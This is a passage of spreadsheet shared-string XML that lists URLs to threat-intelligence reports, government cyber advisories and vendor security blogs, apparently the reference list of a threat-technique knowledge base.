    <t>https://technet.microsoft.com/library/cc770880.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/bb491007.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc785125.aspx</t>
  </si>
  <si>
    <t>https://www.techrepublic.com/blog/data-center/configuring-wireless-settings-via-group-policy/</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/security/ms14-068.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/bb490717.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings</t>
  </si>
  <si>
    <t>http://www.technospot.net/blogs/block-chrome-extensions-using-google-chrome-group-policy-settings/</t>
  </si>
  <si>
    <t>https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery</t>
  </si>
  <si>
    <t>https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage</t>
  </si>
  <si>
    <t>https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis</t>
  </si>
  <si>
    <t>https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2</t>
  </si>
  <si>
    <t>https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/</t>
  </si>
  <si>
    <t>https://eclecticlight.co/2020/08/28/how-notarization-works/</t>
  </si>
  <si>
    <t>https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/</t>
  </si>
  <si>
    <t>https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/</t>
  </si>
  <si>
    <t>https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/</t>
  </si>
  <si>
    <t>https://threatconnect.com/blog/infrastructure-research-hunting/</t>
  </si>
  <si>
    <t>https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/</t>
  </si>
  <si>
    <t>http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html</t>
  </si>
  <si>
    <t>https://www.fidelissecurity.com/threatgeek/threat-intelligence/turbo-twist-two-64-bit-derusbi-strains-converge</t>
  </si>
  <si>
    <t>https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/</t>
  </si>
  <si>
    <t>https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/</t>
  </si>
  <si>
    <t>https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop</t>
  </si>
  <si>
    <t>https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/</t>
  </si>
  <si>
    <t>https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/</t>
  </si>
  <si>
    <t>https://threatpost.com/fin7-backdoor-ethical-hacking-tool/166194/</t>
  </si>
  <si>
    <t>https://threatpost.com/sharpshooter-complexity-scope/142359/</t>
  </si>
  <si>
    <t>http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/</t>
  </si>
  <si>
    <t>https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf</t>
  </si>
  <si>
    <t>https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/</t>
  </si>
  <si>
    <t>https://ss64.com/bash/trap.html</t>
  </si>
  <si>
    <t>https://home.treasury.gov/news/press-releases/sm845</t>
  </si>
  <si>
    <t>https://home.treasury.gov/news/press-releases/sm774</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html</t>
  </si>
  <si>
    <t>http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/</t>
  </si>
  <si>
    <t>https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/carberp</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/conficker</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html</t>
  </si>
  <si>
    <t>https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf</t>
  </si>
  <si>
    <t>http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/</t>
  </si>
  <si>
    <t>https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi</t>
  </si>
  <si>
    <t>https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/19/j/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf?</t>
  </si>
  <si>
    <t>https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_ixeshe.pdf</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-organizations-again.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/20/i/analysis-of-a-convoluted-attack-chain-involving-ngrok.html</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/</t>
  </si>
  <si>
    <t>https://documents.trendmicro.com/assets/wp/wp-two-years-of-pawn-storm.pdf</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html</t>
  </si>
  <si>
    <t>https://success.trendmicro.com/solution/000283381</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/ph/security/news/cybercrime-and-digital-threats/qakbot-resurges-spreads-through-vbs-files</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/</t>
  </si>
  <si>
    <t>https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf</t>
  </si>
  <si>
    <t>https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module/</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/phishing-starts-inside/</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/new-multi-platform-xbash-packs-obfuscation-ransomware-coinminer-worm-and-botnet</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/BKDR_URSNIF.SM?_ga=2.129468940.1462021705.1559742358-1202584019.1549394279</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/18/b/deciphering-confucius-cyberespionage-operations.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/</t>
  </si>
  <si>
    <t>http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html</t>
  </si>
  <si>
    <t>https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_URSNIF.A2?_ga=2.131425807.1462021705.1559742358-1202584019.1549394279</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/</t>
  </si>
  <si>
    <t>https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf</t>
  </si>
  <si>
    <t>https://documents.trendmicro.com/assets/white_papers/wp-pawn-storm-in-2019.pdf</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html</t>
  </si>
  <si>
    <t>http://sjc1-te-ftp.trendmicro.com/images/tex/pdf/RawPOS%20Technical%20Brief.pdf</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd</t>
  </si>
  <si>
    <t>http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf</t>
  </si>
  <si>
    <t>https://vb2020.vblocalhost.com/uploads/VB2020-06.pdf</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/</t>
  </si>
  <si>
    <t>https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf</t>
  </si>
  <si>
    <t>https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/info-stealing-file-infector-hits-us-uk/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/en_us/research/20/g/updates-on-quickly-evolving-thiefquest-macos-malware.html</t>
  </si>
  <si>
    <t>https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets</t>
  </si>
  <si>
    <t>https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/trickbot-updates-its-vnc-module-for-high-value-targets/</t>
  </si>
  <si>
    <t>https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing</t>
  </si>
  <si>
    <t>https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/</t>
  </si>
  <si>
    <t>https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_Analysis.pdf</t>
  </si>
  <si>
    <t>https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/</t>
  </si>
  <si>
    <t>https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/</t>
  </si>
  <si>
    <t>https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/</t>
  </si>
  <si>
    <t>https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-iis-module/</t>
  </si>
  <si>
    <t>https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/</t>
  </si>
  <si>
    <t>https://twitter.com/r0wdy_/status/936365549553991680</t>
  </si>
  <si>
    <t>https://twitter.com/NickTyrer/status/958450014111633408</t>
  </si>
  <si>
    <t>https://twitter.com/ItsReallyNick/status/958789644165894146</t>
  </si>
  <si>
    <t>https://twitter.com/cglyer/status/985311489782374400</t>
  </si>
  <si>
    <t>https://twitter.com/ItsReallyNick/status/945681177108762624</t>
  </si>
  <si>
    <t>https://twitter.com/ItsReallyNick/status/1189622925286084609</t>
  </si>
  <si>
    <t>https://twitter.com/ItsReallyNick/status/1055321652777619457</t>
  </si>
  <si>
    <t>https://twitter.com/ItsReallyNick/status/1055321868641689600</t>
  </si>
  <si>
    <t>https://twitter.com/ItsReallyNick/status/944321013084573697</t>
  </si>
  <si>
    <t>https://twitter.com/leoloobeek/status/939248813465853953</t>
  </si>
  <si>
    <t>https://twitter.com/ItsReallyNick/status/850105140589633536</t>
  </si>
  <si>
    <t>https://twitter.com/dez_/status/986614411711442944</t>
  </si>
  <si>
    <t>https://www.stigviewer.com/stig/microsoft_windows_server_2012_member_server/2013-07-25/finding/WN12-CC-000077</t>
  </si>
  <si>
    <t>https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2015-06-25/finding/V-26482</t>
  </si>
  <si>
    <t>https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet</t>
  </si>
  <si>
    <t>https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services</t>
  </si>
  <si>
    <t>https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise</t>
  </si>
  <si>
    <t>https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games</t>
  </si>
  <si>
    <t>https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/lapsus-group/</t>
  </si>
  <si>
    <t>https://www.justice.gov/opa/page/file/1098481/download</t>
  </si>
  <si>
    <t>https://www.justice.gov/opa/press-release/file/1328521/download</t>
  </si>
  <si>
    <t>https://noticeofpleadings.com/phosphorus/files/Complaint.pdf</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/TA17-293A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/TA13-175A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/TA15-314A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/TA18-201A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/TA17-318A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/TA17-164A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/analysis-reports/AR19-100A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/analysis-reports/ar20-045d</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/analysis-reports/AR18-221A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/TA17-181A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/TA16-091A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/AA18-337A</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/alerts/TA17-156A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/TA18-086A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/TA18-074A</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/ncas/alerts/TA18-106A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/analysis-reports/AR18-165A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/TA17-318B</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/TA17-132A</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/alerts/TA18-106A</t>
  </si>
  <si>
    <t>https://twitter.com/CNMF_CyberAlert/status/1311743710997159953</t>
  </si>
  <si>
    <t>https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html</t>
  </si>
  <si>
    <t>https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged</t>
  </si>
  <si>
    <t>http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html</t>
  </si>
  <si>
    <t>https://ubuntu.com/server/docs/service-sssd</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046</t>
  </si>
  <si>
    <t>http://hick.org/code/skape/papers/needle.txt</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/10/unit42-badpatch/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/10/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/ironnetinjector/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/08/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/pingpull-gallium/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/</t>
  </si>
  <si>
    <t>https://pan-unit42.github.io/playbook_viewer/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2015/07/unit-42-technical-analysis-seaduke/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/siloscape/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/ta551-shathak-icedid/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/valak-evolution/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/#whispergate-malware-family</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/acidbox-rare-malware/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/bendybear-shellcode-blacktech/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/clop-ransomware/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/</t>
  </si>
  <si>
